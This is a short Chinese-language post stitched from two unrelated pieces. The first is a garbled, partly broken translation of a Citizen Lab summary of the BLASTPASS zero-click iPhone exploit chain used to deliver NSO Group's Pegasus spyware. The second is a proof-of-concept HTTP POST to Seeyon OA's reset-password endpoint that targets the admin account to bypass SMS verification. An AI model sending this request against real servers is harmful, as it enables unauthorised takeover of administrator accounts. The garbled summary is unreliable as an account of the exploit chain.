BLASTPASS NSO集团iPhone零点击，0day 漏洞在野外捕获
上周，而检查由华盛顿特区的民间社会组织与国际办事处雇用的个人的设备，公民实验室发现了一个积极利用零点击漏洞被用来提供NSO集团的飞马雇佣军间谍软件。
BLASTPASS漏洞利用链
我们将漏洞利用链称为BLASTPASS。该漏洞链能够在受害者没有任何交互的情况下危及运行iOS最新版本（16.6）的iPhone .
所涉及的漏洞帕斯卡附件包含从攻击者iMessage Account发送给受害者的恶意图像。
我们期望在未来发布一个更详细的关于漏洞利用链的讨论。

https://citizenlab.ca/2023/09/blastpass-nso-group-iphone-zero-click-zero-day-exploit-captured-in-the-wild/

致远 短信验证码绕过重置密码漏洞 POC
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1 Host: ip:port
Content-Type: application/json
Accept-Encoding: gzip
{"loginName":"admin"}